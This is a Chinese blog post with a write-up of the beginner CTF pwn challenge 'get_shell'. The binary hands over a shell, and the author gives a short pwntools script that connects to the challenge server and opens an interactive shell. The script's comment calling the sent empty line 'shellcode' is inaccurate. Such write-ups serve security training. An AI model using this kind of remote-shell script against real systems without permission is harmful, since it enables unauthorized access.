PWN-攻防世界 get_shell

时间：2020-07-14 14:54:45 阅读：166 评论：0 收藏：0 [点我收藏+]

get_shell

难度系数： 6.0
题目描述：运行就能拿到shell呢，真的
题目场景：
220.249.52.133:57808
题目附件：
链接：https://pan.baidu.com/s/13OAHCWRew06-jZINlvVUtA
提取码：eodj

鉴于这个难度的题，就直接拉入64位IDA了（如果是32位则会报错）
技术分享图片

F5反汇编一下
技术分享图片

够直接....
再一结合他的题目描述，可以的，没骗人

开始编写EXP啦

from pwn import *   #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","57808")  # 链接服务器远程交互
r.sendline()  # 将shellcode 发送到远程连接
r.interactive()  # 将控制权交给用户，这样就可以使用打开的shell了

运行，结束
技术分享图片
flag乖乖出来啦~
flag就不打码了，没有什么必要

PWN-攻防世界 get_shell

原文：https://www.cnblogs.com/XXX-Echoed/p/13298465.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)